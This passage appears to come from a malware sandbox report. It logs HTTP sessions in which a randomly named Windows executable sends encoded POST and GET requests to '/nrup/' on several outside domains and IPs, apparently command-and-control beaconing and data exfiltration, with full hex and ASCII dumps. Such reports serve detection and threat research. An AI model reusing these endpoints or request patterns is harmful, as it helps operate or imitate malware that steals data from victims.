pX6dR=Rzg+OC6MuGCD1tgUvj5UdMuHziSuluGKYIlC1hAvRPYSGs8nNnkfvtdb+Adk5rAj8HvnG4rUFNg//UG9nrHRJxwWN6Zs7jL5K3h0vzP9K2vYWLv+OpnObHd1vS0nqEIk8gnN+WKr2KruKCD0IpGxBmrqNP4ZFQftcm0dLF49ZxQpjTUEFQf4MKxyWFReO7FYkw==
May 3, 2024 11:32:53.828337908 CEST	165	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Fri, 03 May 2024 09:32:53 GMT Content-Type: text/html Content-Length: 2 Connection: close ETag: "660279db-2" Data Raw: 31 0a Data Ascii: 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49168	47.238.226.135	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:32:56.341233969 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.hggg2qyws.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.hggg2qyws.sbs Connection: close Content-Length: 3626 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.hggg2qyws.sbs/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 52 7a 67 2b 4f 43 36 4d 75 47 43 44 30 4e 77 55 70 41 52 55 66 73 75 45 76 53 53 75 2f 65 47 52 59 49 35 43 31 6b 78 79 52 62 38 53 42 2f 6f 6e 4e 45 41 66 74 74 64 62 34 41 64 67 39 72 41 50 38 45 54 56 47 36 44 75 46 50 4d 2f 2f 32 75 39 32 39 54 53 48 68 77 49 4a 36 59 36 37 6a 4c 57 4b 33 77 2f 76 7a 61 6f 4b 33 48 59 57 2f 58 2b 5a 70 6e 42 48 58 64 31 76 53 30 72 71 45 49 49 38 67 2b 53 2b 58 53 37 33 35 44 75 4b 67 4c 30 4b 4b 65 32 4e 32 72 55 4f 50 35 6f 57 43 72 6b 64 58 6f 73 58 54 77 44 51 67 4a 4a 6f 6a 49 37 4e 78 57 33 46 72 46 34 62 7a 30 66 46 49 42 56 2f 77 34 70 6a 71 6f 65 57 54 77 30 79 5a 39 4d 68 4f 74 6f 79 4b 53 39 67 59 67 53 74 53 48 47 44 4c 43 69 46 44 62 4f 39 53 4e 4c 46 4e 42 38 54 64 70 44 6c 70 71 4f 51 30 74 35 4f 2f 49 73 4e 63 6c 75 31 67 35 46 47 38 36 44 65 34 59 61 58 73 61 38 47 63 55 57 78 77 71 54 59 74 68 78 75 5a 62 76 53 6f 75 53 6a 56 34 55 33 31 66 2f 39 64 38 4f 50 34 4d 32 69 74 39 68 6a 50 49 6c 56 45 46 68 50 73 4a 31 73 4a 66 51 [TRUNCATED] Data Ascii: pX6dR=Rzg+OC6MuGCD0NwUpARUfsuEvSSu/eGRYI5C1kxyRb8SB/onNEAfttdb4Adg9rAP8ETVG6DuFPM//2u929TSHhwIJ6Y67jLWK3w/vzaoK3HYW/X+ZpnBHXd1vS0rqEII8g+S+XS735DuKgL0KKe2N2rUOP5oWCrkdXosXTwDQgJJojI7NxW3FrF4bz0fFIBV/w4pjqoeWTw0yZ9MhOtoyKS9gYgStSHGDLCiFDbO9SNLFNB8TdpDlpqOQ0t5O/IsNclu1g5FG86De4YaXsa8GcUWxwqTYthxuZbvSouSjV4U31f/9d8OP4M2it9hjPIlVEFhPsJ1sJfQbbOOGr/UldjKMsoRFMNrDWMlImN+OR6WKRQYmV3XnpbIgwzoaxv+a1bYGAOicQvvoptcGE5VN2xJq4tRATdpxjkqrMXp9UmG7dQb9BAvuuvUx7zMLlDeCSGFeJfHTFi9y5i2uzL+PLMlHpmkX+Iuj5h+MUd/dzCo+bUYx1wqrMirjWT1STkHRla00nTa9eiCFkavUWLM8XZzLvsq9i5u6d3j4yQifdeQe5knqxsb3Mqt/QMpJUDHdux5LU16YWqu9QSq6T22tTAHdkbFXc8p3+sykJVKOYzuILi1NskA7yLvZuWGGgL7hRySNk2NwWbFcRTmrgmklVi7YHpHocigz8SHt3OfWz6ABdAoIeQEsnFT3Uk9gGgfYSFxAafv0NVuPpEIUr4tRckYOm7HznTB4QnpLUw1yRNwKZeEk4iXlp3KNf7fjYNschFdoIJESB/EbgliHQwXDsm46+jru+3rZAXO9PrEHeTjaBwnZ7W3RSBhr/ELLmOAdcEEgcCxKN2wi6ZrFCW2Yw4TSPNLgNmUlbG6immv8xMf4BrHqe9cUzqnT7pUbXT7Gx5sI4zTYAS8dyQnwO5wl2QcCIebLaboSSQ+FuAR5F/WiZ00EY9bZ6TsbqIXNu4apCXVaeoT/7JmKCvfEyC1Pu87L0FMGK47zj5pf32NwMGVyP [TRUNCATED]
May 3, 2024 11:32:56.641988993 CEST	1583	OUT	Data Raw: 79 79 58 57 46 2f 70 71 4d 61 30 44 76 63 70 62 6f 57 65 55 49 53 31 70 45 68 57 4f 4c 35 53 36 36 56 37 35 62 77 52 6c 34 70 51 4f 67 70 41 62 4d 50 45 4e 4f 61 45 56 59 72 79 77 62 62 42 52 73 54 6c 4b 65 56 31 73 62 2f 34 62 50 54 58 7a 38 48 Data Ascii: yyXWF/pqMa0DvcpboWeUIS1pEhWOL5S66V75bwRl4pQOgpAbMPENOaEVYrywbbBRsTlKeV1sb/4bPTXz8HbLapuY2CbKVT6g6fd1jjuWVm+JBM/0W2b4mNg3yGPpQasmJkt67KLiLwWkz6Mj2WXe+S2uvGsAmKyZW42KzxBXR18Vsq3EG9y1xyAz8QaVXfO1ZRMeKxAujtZGgADtMpz+p/zC1o2+rJcWtxEZy4equN5HCuFzKPd
May 3, 2024 11:32:56.942785978 CEST	165	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Fri, 03 May 2024 09:32:56 GMT Content-Type: text/html Content-Length: 2 Connection: close ETag: "660279db-2" Data Raw: 31 0a Data Ascii: 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49169	47.238.226.135	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:32:59.169436932 CEST	472	OUT	GET /nrup/?pX6dR=cxIeN1iVhQqOwsowpzRnZtCznzKsqLvfdqpS9UswCbkbA/58Vi1sucBg6AEQyfE3zCqKK/TeeNcUyXGKguuzOA8pGaYO9UjuKGEJ7C/XCVyDdYvyJ7HtIExhgCVf&tv=6TdD8B HTTP/1.1 Host: www.hggg2qyws.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
May 3, 2024 11:32:59.474654913 CEST	224	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 May 2024 09:32:59 GMT Content-Type: text/html Content-Length: 2 Last-Modified: Tue, 26 Mar 2024 07:31:39 GMT Connection: close ETag: "660279db-2" Accept-Ranges: bytes Data Raw: 31 0a Data Ascii: 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49170	162.255.119.150	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:04.703079939 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.297tamatest1kb.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.297tamatest1kb.com Connection: close Content-Length: 2162 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.297tamatest1kb.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 58 50 54 52 2b 72 52 36 77 56 57 47 68 77 6c 56 74 6c 36 4d 69 32 65 4b 63 2b 6d 70 42 79 77 76 68 36 6d 64 55 4c 33 74 2f 38 78 37 55 4c 57 33 4d 42 64 6a 5a 34 33 4c 53 41 46 51 64 2b 6f 4f 5a 68 6a 69 7a 47 37 45 32 48 5a 30 38 57 61 73 6a 56 4e 67 53 32 49 2b 55 49 76 78 69 30 4e 50 74 51 62 4d 32 53 51 72 58 64 67 43 57 49 5a 33 33 37 79 61 71 70 65 6c 6a 5a 4f 61 71 51 54 42 2f 79 51 6a 65 44 34 58 48 56 50 4a 6b 33 63 32 44 79 34 53 39 73 6a 62 6e 58 32 47 6a 57 45 7a 2b 78 38 32 67 6f 4f 6e 66 35 6f 7a 49 41 75 57 4d 72 79 56 6c 63 49 6d 62 55 49 2f 41 50 6a 59 75 68 30 51 41 57 43 6c 57 52 4d 74 46 31 65 6b 77 52 43 51 35 6c 73 50 75 68 36 64 66 46 2f 78 44 54 58 46 74 5a 4a 35 74 6f 71 39 74 35 4c 77 63 70 50 2f 30 50 74 51 50 54 33 6a 74 56 54 43 42 5a 34 4f 32 37 59 6f 6d 4d 4a 46 38 55 62 4c 68 6d 50 4f 4a 58 58 6c 68 37 79 56 33 56 63 73 68 71 78 79 4b 68 56 36 69 58 52 47 2b 68 4f 48 64 50 36 79 4e 61 30 48 32 49 69 2b 47 6a 64 78 79 4c 65 4e 55 2f 62 6f 68 75 41 6b [TRUNCATED] Data Ascii: pX6dR=XPTR+rR6wVWGhwlVtl6Mi2eKc+mpBywvh6mdUL3t/8x7ULW3MBdjZ43LSAFQd+oOZhjizG7E2HZ08WasjVNgS2I+UIvxi0NPtQbM2SQrXdgCWIZ337yaqpeljZOaqQTB/yQjeD4XHVPJk3c2Dy4S9sjbnX2GjWEz+x82goOnf5ozIAuWMryVlcImbUI/APjYuh0QAWClWRMtF1ekwRCQ5lsPuh6dfF/xDTXFtZJ5toq9t5LwcpP/0PtQPT3jtVTCBZ4O27YomMJF8UbLhmPOJXXlh7yV3VcshqxyKhV6iXRG+hOHdP6yNa0H2Ii+GjdxyLeNU/bohuAkhkLURmfWZrPTOKzzvkOEvkUm9LzuBwELbqmbPwmmn6Y8V2/YrAYZSHtQCuaMh7ewTVApCp87RN9K206uL+NHRcJxcfTUzTcnMp6l3NrrBgHD9sbG/nUyhj5YS/D5vRJ3Z6MWZRSiv8OdhFifkVWgBZU2P+VBg2AOqPiEDf7bVPhy84bwVM876G5UrGpj1MCpTkZFP/WMr003wNyuqD/FFFaDNuaQkYiCnbCdQs4FYky0g6qjtd27iLJkRs8pM2XNj0Jls/P9TRZ9XDatyj+R22uPZB/At4gP4gJ0mn13t5ho8stYVBEk1Wz9dDBHL8ON/SdOiemidlJdXoCze6RHp/CdMzyvTQdQArmQaPhQoibcM77s4pzQ5PuvVYRq/V8Q5D/bhkigqkNjK4LYQ6BVgbwUsuGwc0ZP6GvLgrxqbfDdFfIpR970R2ROlTRV+vStdbEQMOJlhj9EH3QnipPcxcTwT28QpzGuTN+O5CReFtAO1vNEXCHj3VUafB+nFs3wcGUP0tRcAXg+OB5cqf2ufEiTOPLfkoT3+AMh1t4JCbKx8sfKkxE9n7sRJKjcV1EAWfoMWsI9IWHwdNqFMkhzL7UbLdcA3v00M8Os/1s3vdek9bf9nQ9bEFf9thqKpjWViXIKy7tjYuY3luA1L0XHrDPVoWFRpoZrue [TRUNCATED]
May 3, 2024 11:33:04.814555883 CEST	134	OUT	Data Raw: 38 58 37 46 45 31 41 55 32 67 6b 59 32 6a 55 4a 39 56 76 69 78 2b 6f 6c 65 77 62 63 7a 44 37 77 32 33 68 4f 32 79 4d 55 57 45 62 2f 64 34 53 69 73 4b 4a 4f 47 73 31 66 2f 37 44 71 70 7a 4d 31 64 63 46 6f 65 36 65 4f 6b 6e 41 6e 74 53 49 6a 49 74 Data Ascii: 8X7FE1AU2gkY2jUJ9Vvix+olewbczD7w23hO2yMUWEb/d4SisKJOGs1f/7DqpzM1dcFoe6eOknAntSIjItph47DZVu7fwrLSL+eqnN09K+ySKL25xLhnQ3FJ01RryptEpGKncN
May 3, 2024 11:33:04.927161932 CEST	1173	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 09:33:04 GMT Content-Type: text/html; charset=utf-8 Content-Length: 976 Connection: close X-Served-By: Namecheap URL Forward Server: namecheap-nginx Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 63 6f 6e 74 65 6e 74 2d 74 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 45 59 57 4f 52 44 53 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 56 45 52 53 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49171	162.255.119.150	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:07.336581945 CEST	751	OUT	POST /nrup/ HTTP/1.1 Host: www.297tamatest1kb.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.297tamatest1kb.com Connection: close Content-Length: 202 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.297tamatest1kb.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 58 50 54 52 2b 72 52 36 77 56 57 47 68 7a 64 56 71 6b 36 4d 6a 57 65 4b 66 2b 6d 70 4c 53 77 74 68 36 62 39 55 4b 43 6f 2b 4b 78 37 55 62 6d 33 4e 31 39 6a 55 59 33 4b 47 77 45 5a 51 65 6f 68 5a 68 69 65 7a 48 48 45 32 48 4e 30 38 79 79 73 71 77 78 6a 61 6d 49 38 50 34 76 77 69 78 56 56 74 51 58 6d 32 53 34 72 58 63 63 43 56 49 70 33 68 35 4b 61 76 5a 65 6a 72 35 4f 4e 71 51 50 59 2f 79 41 72 65 43 45 58 41 6b 54 4a 6b 69 6f 32 45 6a 34 53 30 4d 6a 47 74 33 33 59 69 32 31 2f 6e 47 63 43 6a 2b 43 45 58 4a 30 4f 4a 78 57 34 57 71 36 61 6d 2b 30 6d 46 55 68 41 43 2b 65 70 73 67 3d 3d Data Ascii: pX6dR=XPTR+rR6wVWGhzdVqk6MjWeKf+mpLSwth6b9UKCo+Kx7Ubm3N19jUY3KGwEZQeohZhiezHHE2HN08yysqwxjamI8P4vwixVVtQXm2S4rXccCVIp3h5KavZejr5ONqQPY/yAreCEXAkTJkio2Ej4S0MjGt33Yi21/nGcCj+CEXJ0OJxW4Wq6am+0mFUhAC+epsg==
May 3, 2024 11:33:07.448276997 CEST	1173	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 09:33:07 GMT Content-Type: text/html; charset=utf-8 Content-Length: 976 Connection: close X-Served-By: Namecheap URL Forward Server: namecheap-nginx Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 63 6f 6e 74 65 6e 74 2d 74 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 45 59 57 4f 52 44 53 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 56 45 52 53 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49172	162.255.119.150	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:09.971736908 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.297tamatest1kb.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.297tamatest1kb.com Connection: close Content-Length: 3626 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.297tamatest1kb.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 58 50 54 52 2b 72 52 36 77 56 57 47 69 54 4e 56 73 33 53 4d 6c 32 65 4e 42 75 6d 70 42 79 77 70 68 36 6e 39 55 4c 33 74 2f 2b 56 37 55 4a 65 33 4e 52 64 6a 59 34 33 4b 4f 51 46 51 64 2b 6f 4e 5a 68 66 79 7a 47 33 36 32 46 68 30 38 55 69 73 6a 57 6c 67 56 32 49 2b 63 6f 76 33 69 78 56 45 74 51 48 69 32 53 30 42 58 66 73 43 57 36 78 33 67 4a 4b 62 67 35 65 6a 72 35 4f 42 71 51 50 30 2f 79 59 7a 65 47 70 4b 48 57 4c 4a 6b 48 63 32 47 43 34 52 79 4d 6a 43 73 33 33 57 6a 57 49 6b 2b 78 38 71 67 73 69 64 66 35 30 7a 4a 57 36 57 4d 73 6d 61 71 73 49 70 45 6b 49 2f 4f 76 6a 65 75 68 31 4a 41 57 43 6c 57 51 41 74 47 46 65 6b 77 51 43 50 36 56 73 50 6e 42 36 62 51 6c 79 4b 44 53 7a 76 74 61 67 62 73 66 53 39 73 2f 6e 77 59 5a 50 2f 6c 50 74 4b 50 54 33 75 6b 31 54 34 42 5a 67 73 32 2f 39 7a 6d 4d 4a 46 38 53 50 4c 72 51 6a 4f 4a 48 58 6c 71 62 79 59 74 6c 63 72 68 71 45 56 4b 68 4a 36 69 56 68 47 2f 57 71 48 56 74 69 78 44 4b 30 47 39 6f 69 38 58 7a 64 6b 79 4b 32 6e 55 2f 54 4f 68 71 45 6b [TRUNCATED] Data Ascii: pX6dR=XPTR+rR6wVWGiTNVs3SMl2eNBumpBywph6n9UL3t/+V7UJe3NRdjY43KOQFQd+oNZhfyzG362Fh08UisjWlgV2I+cov3ixVEtQHi2S0BXfsCW6x3gJKbg5ejr5OBqQP0/yYzeGpKHWLJkHc2GC4RyMjCs33WjWIk+x8qgsidf50zJW6WMsmaqsIpEkI/Ovjeuh1JAWClWQAtGFekwQCP6VsPnB6bQlyKDSzvtagbsfS9s/nwYZP/lPtKPT3uk1T4BZgs2/9zmMJF8SPLrQjOJHXlqbyYtlcrhqEVKhJ6iVhG/WqHVtixDK0G9oi8XzdkyK2nU/TOhqEkhi/UenfWZ7PSHqz3iEy2vlsI9LH+BzALa7mbMyel7aZ3Q2+WhgYVSHozCv6MgKmwSWYpGaU4AN8C9U6DFeNqRcdpcb36zm4nMZ6lnbfscAHG6sadkXUshj5mS/jD6zZ3Z78WaDKiv8OexViZv1bFBZYyP+JRgwsOqaqEDaPbPfhymIb7cs8x6GturHRZ28GpTHxFJ9OMj0012NyvuD/yFFKDNqCAkYKCm6CdQOQFQEy4parztd3KiIlgRss5M0zNj1Jlu7T9exZwVDbm2j/h236fZATmt54P+DB0qyZ3sZhu3MtYchE81WrtdBEwL92N+nBOg+mhVFJebICwPqRVp+udMz+vTQ1QBZOQIsJQhybeRr752J/85LyVVa8t/W4Q4S/b2W6v0kNlJILoU6BtgbwIsvCecl5P9WPLsvtrSfDWP/JpSN7IR2gllW4Y+cmtdb0QM8hlhz9EH3QmipPixcfaT3M6pzGuTfGO50NeddALq/MGdiH93VRxfFTCFvzwf30P0tRTdXg9Dh5fqfygfEjEOPHfkZ338S0h2LEJSLKx0MfNqhE8n7sBJLf2VwwAEeIMVqc+KmHLfNqtZU9sL7YDLcIA3fI0NoSs/Fs3ndenorfkpw5HEBHHtkGapSGVz0AK+cxkNOYMqOA3L0a5rDXNoW9rprpru+ [TRUNCATED]
May 3, 2024 11:33:10.081784964 CEST	1598	OUT	Data Raw: 41 35 37 77 30 31 47 6b 32 67 67 62 4f 73 51 4a 39 66 71 69 78 4a 6f 6c 65 59 62 63 37 48 37 79 69 6e 68 4d 47 79 4d 57 4f 45 61 50 64 37 45 69 73 49 4d 4f 47 71 31 66 7a 47 44 71 67 35 4d 31 4e 63 46 70 69 36 66 75 55 6e 57 33 74 53 42 44 4a 6e Data Ascii: A57w01Gk2ggbOsQJ9fqixJoleYbc7H7yinhMGyMWOEaPd7EisIMOGq1fzGDqg5M1NcFpi6fuUnW3tSBDJn3R4uepZt7fJsVm7lQvP10pmb1gCp2Yd440IVDJBxaafX8wsWNQUcXNZpARl4F0c3vDUsIMxVNAsDeaPdUP+nFkZldyihpp+FXXGwpAzRmaXbK8dvpiTV82UURWfIDU5wHp2HYhNs3Uj5J2Un7Qvnp1t0aaniTFFCa
May 3, 2024 11:33:10.192188025 CEST	1173	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 09:33:10 GMT Content-Type: text/html; charset=utf-8 Content-Length: 976 Connection: close X-Served-By: Namecheap URL Forward Server: namecheap-nginx Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 63 6f 6e 74 65 6e 74 2d 74 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 45 59 57 4f 52 44 53 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 56 45 52 53 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49173	162.255.119.150	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:12.608469963 CEST	477	OUT	GET /nrup/?pX6dR=aN7x9cBVxwix9wZx7W63qGecWvzsMiI/orbHVM7uweNeZbe3aghpRaSsJCdVU54yexiCzw7M43tjxUe+olQadlEjapDpq3RKvSvMx1ELA/lUdJRJgrfKn72amtTp&tv=6TdD8B HTTP/1.1 Host: www.297tamatest1kb.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
